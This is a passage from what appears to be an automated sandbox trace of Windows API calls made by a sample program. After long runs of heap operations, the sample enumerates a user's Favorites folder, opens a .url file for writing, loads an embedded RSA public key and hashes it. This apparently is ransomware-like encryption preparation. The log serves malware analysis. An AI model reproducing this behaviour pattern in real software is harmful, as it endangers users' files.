0x384518 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0205.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32fecb0 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0205.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81470 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fecb0 | out: hHeap=0x2c0000) returned 1 [0205.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81470 | out: hHeap=0x2c0000) returned 1 [0205.261] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.261] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.261] PathFindFileNameW (pszPath="") returned="" [0205.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32fecb0 [0205.261] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fecb0 | out: hHeap=0x2c0000) returned 1 [0205.262] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.262] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0205.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32fecb0 [0205.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2eee30 [0205.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fecb0 | out: hHeap=0x2c0000) returned 1 [0205.262] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0205.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0205.262] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0205.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32fecb0 [0205.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fecb0 | out: hHeap=0x2c0000) returned 1 [0205.262] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned=".url" [0205.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.263] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=236) returned 1 [0205.263] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.266] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.266] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.267] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.267] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xec, lpOverlapped=0x0) returned 1 [0205.267] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.267] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.267] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.267] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.268] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.268] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.268] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.268] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.268] GetLastError () returned 0x0 [0205.268] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.268] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.268] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.268] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.268] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x32b69d8 [0205.268] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81470 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6d0 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b814b8 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6e8 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe718 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe730 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0205.269] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe718 | out: hHeap=0x2c0000) returned 1 [0205.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe730 | out: hHeap=0x2c0000) returned 1 [0205.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe730 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe718 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0205.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.270] 